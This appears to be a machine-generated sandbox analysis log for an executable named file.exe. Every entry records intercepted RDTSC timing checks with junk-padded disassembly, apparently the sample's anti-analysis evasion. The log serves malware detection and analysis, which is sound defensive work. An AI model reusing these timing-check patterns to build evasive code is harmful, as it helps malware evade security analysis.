              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C003A second address: 6C0064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FBBF10EEF96h 0x0000000a jmp 00007FBBF10EEFA9h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C042A second address: 6C042E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C042E second address: 6C0432 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C0432 second address: 6C043A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BFAF4 second address: 6BFB16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF10EEFA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jo 00007FBBF10EEF96h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BFB16 second address: 6BFB1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BFB1C second address: 6BFB21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BFB21 second address: 6BFB27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BFB27 second address: 6BFB2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C0743 second address: 6C0749 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C0749 second address: 6C0753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FBBF10EEF96h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C0C9A second address: 6C0C9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C0C9E second address: 6C0CA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C0CA2 second address: 6C0CA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C0CA8 second address: 6C0CB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C0CB6 second address: 6C0CBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C3A9E second address: 6C3AAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C3AAE second address: 6C3AD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 push esi 0x00000008 pop esi 0x00000009 js 00007FBBF0522A56h 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FBBF0522A69h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CC692 second address: 6CC69D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FBBF10EEF96h 0x0000000a pop edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CC69D second address: 6CC6B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF0522A60h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CB2D1 second address: 6CB2D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CB2D7 second address: 6CB2DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CB2DB second address: 6CB2DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CB2DF second address: 6CB2E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CB2E5 second address: 6CB2EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CB2EF second address: 6CB2F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CB5D0 second address: 6CB629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FBBF10EEF96h 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FBBF10EEFA9h 0x00000011 pop eax 0x00000012 popad 0x00000013 push edi 0x00000014 push edx 0x00000015 jmp 00007FBBF10EEFA6h 0x0000001a pop edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FBBF10EEFA7h 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CB629 second address: 6CB62D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67C3D3 second address: 67C3F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBBF10EEFA9h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D0E59 second address: 6D0E5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D0E5D second address: 6D0E63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D07C1 second address: 6D07C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D07C5 second address: 6D07CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D07CB second address: 6D07DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBBF0522A60h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3D4C second address: 6D3D69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF10EEFA9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D340A second address: 6D342C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF0522A60h 0x00000007 jl 00007FBBF0522A58h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D342C second address: 6D3436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FBBF10EEF96h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3436 second address: 6D3465 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF0522A63h 0x00000007 jmp 00007FBBF0522A62h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 pop eax 0x00000013 pop ecx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D35C1 second address: 6D35C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D35C7 second address: 6D35CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D372E second address: 6D373E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBBF10EEF96h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D373E second address: 6D3742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3742 second address: 6D375D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FBBF10EEF9Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D375D second address: 6D3761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3761 second address: 6D3765 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DBCD6 second address: 6DBCE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007FBBF0522A56h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DA571 second address: 6DA57B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FBBF10EEF96h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DA57B second address: 6DA5A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FBBF0522A64h 0x0000000f jmp 00007FBBF0522A5Ch 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DAB56 second address: 6DAB5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DAB5C second address: 6DAB79 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 je 00007FBBF0522A5Ah 0x0000000f push eax 0x00000010 pop eax 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 jp 00007FBBF0522A56h 0x0000001b push edi 0x0000001c pop edi 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DB153 second address: 6DB15D instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBBF10EEF96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DB43C second address: 6DB446 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBBF0522A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DB6C9 second address: 6DB6CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DB6CF second address: 6DB6DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FBBF0522A56h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DB974 second address: 6DB9A6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FBBF10EEF9Fh 0x0000000f jmp 00007FBBF10EEFA9h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DEE48 second address: 6DEE64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBBF0522A67h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DEF93 second address: 6DEFC5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007FBBF10EEFA7h 0x0000000e jnl 00007FBBF10EEF96h 0x00000014 jno 00007FBBF10EEF96h 0x0000001a popad 0x0000001b pushad 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DEFC5 second address: 6DEFCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DEFCB second address: 6DEFD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DEFD5 second address: 6DEFDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DF29A second address: 6DF2BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007FBBF10EEF9Dh 0x0000000b pop edx 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007FBBF10EEF9Ah 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EFE91 second address: 6EFE95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE0B1 second address: 6EE0C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBBF10EEFA1h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE0C8 second address: 6EE0CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE0CC second address: 6EE0D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE0D0 second address: 6EE0E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FBBF0522A5Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE0E5 second address: 6EE114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 js 00007FBBF10EEF98h 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FBBF10EEFA9h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE114 second address: 6EE118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE3DF second address: 6EE3E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE3E4 second address: 6EE3FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBBF0522A66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE555 second address: 6EE569 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF10EEF9Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007FBBF10EEF96h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE569 second address: 6EE56D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE6FE second address: 6EE708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EEB75 second address: 6EEB7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EEB7D second address: 6EEB96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF10EEFA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EEB96 second address: 6EEB9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F2520 second address: 6F2527 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F2527 second address: 6F2568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FBBF0522A63h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FBBF0522A5Ch 0x00000012 jmp 00007FBBF0522A5Ch 0x00000017 jng 00007FBBF0522A62h 0x0000001d jne 00007FBBF0522A56h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F714A second address: 6F714E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F714E second address: 6F715A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F715A second address: 6F715E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F715E second address: 6F7164 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F7164 second address: 6F7182 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF10EEFA8h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 704555 second address: 704571 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBBF0522A66h 0x00000008 jmp 00007FBBF0522A5Ah 0x0000000d jo 00007FBBF0522A56h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 704571 second address: 704575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 704575 second address: 704579 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706FB7 second address: 706FBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706FBB second address: 706FC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706BFB second address: 706BFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71B09D second address: 71B0C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FBBF0522A56h 0x0000000a popad 0x0000000b jbe 00007FBBF0522A5Eh 0x00000011 pop edx 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 jbe 00007FBBF0522A56h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71B372 second address: 71B380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71B380 second address: 71B384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71B384 second address: 71B388 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71B388 second address: 71B3B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FBBF0522A78h 0x0000000c jmp 00007FBBF0522A5Eh 0x00000011 jmp 00007FBBF0522A64h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71B3B6 second address: 71B3DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF10EEFA8h 0x00000007 jc 00007FBBF10EEF9Eh 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71B7E9 second address: 71B816 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FBBF0522A56h 0x00000009 jmp 00007FBBF0522A67h 0x0000000e jc 00007FBBF0522A56h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71B816 second address: 71B81C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71FDB0 second address: 71FDB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 723891 second address: 7238A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBBF10EEFA0h 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7238A9 second address: 7238AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C473 second address: 72C480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
